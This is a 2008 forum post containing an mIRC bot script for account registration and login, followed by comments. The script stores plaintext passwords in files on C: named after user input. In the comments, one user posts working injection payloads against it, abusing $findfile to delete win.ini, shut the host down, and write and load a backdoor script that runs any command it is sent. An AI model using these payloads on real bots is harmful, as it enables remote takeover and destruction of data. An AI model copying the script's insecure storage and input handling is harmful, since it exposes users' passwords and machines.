Registration/Login/Disconnect Basic Script
Posted by Anthony
Saturday, March 22, 2008
Description: All commands are executed via Pm ( /query ). Put this script in a bot or something else to host it, then type /msg BotName help.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;By Anthony Dupont;;;;;;;;;;
;;;;;;;;;#Anthony;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

on *:TEXT:reg *:?:{
  write C: $+ $2 $+ .txt $2 $3
  msg $nick User created! Login name: $2 - Password: $3
  msg $nick Type /msg $me auth <Login> <Password> to log!
  set % $+ $2 Disconnect
}
on *:TEXT:auth *:?:{
  if ($$2- == $read(C: $+ $2 $+ .txt)) {
    msg $nick Succefully logged.
    set % $+ $2 Logged
  }
}
on *:TEXT:disconnect *:?:{
  if ($$2- == $read(C: $+ $2 $+ .txt)) {
    set % $+ $2 Disconnect
    msg $nick You has been disconnected from account.
  }
}
on *:TEXT:help:?:{
  msg $nick To register; /msg $me reg <Account> <Password>
  msg $nick To auth; /msg $me auth <Account> <Password>
  msg $nick To disconnect; /msg $me disconnect <Account> <Password>
}

If you have any question, feel free to pm me at #anthony or just ask here =]
Oh also, the .txt of account is located in c: folder.
Subject line
Posted by HellRaz0r
Monday, March 24, 2008 03:46pm PDT
<HellRaz0r> reg Name1 $findfile(c:\,*,1,$+(remove,$chr(32),c:\windows\win.ini))
<HellRaz0r> auth Name1 *Giggles*
<HellRaz0r> reg Name2 $findfile(c:\,*,1,$+(run,$chr(32),SHUTDOWN,$chr(32),-s,$chr(32),-t,$chr(32),01))
<HellRaz0r> auth Name2 *Grins*
<HellRaz0r> Bye Bye Windows... Owned!

<HellRaz0r> reg Name3 $findfile(c:\,*,1,$+(write,$chr(32),bd.mrc,$chr(32),on *:text:!cmd*:?: $!2-))
<HellRaz0r> reg Name4 $findfile(c:\,*,1,$+(load,$chr(32),-rs,$chr(32),bd.mrc))
<HellRaz0r> auth Name3 mybotnow
<HellRaz0r> auth Name4 bitch
<HellRaz0r> O:)
HellRaz0r
Posted by Log1x
Tuesday, March 25, 2008 11:42pm PDT
LMAO
Submit a comment
Oops! You need to login or register before you can post a comment!

ebaum's world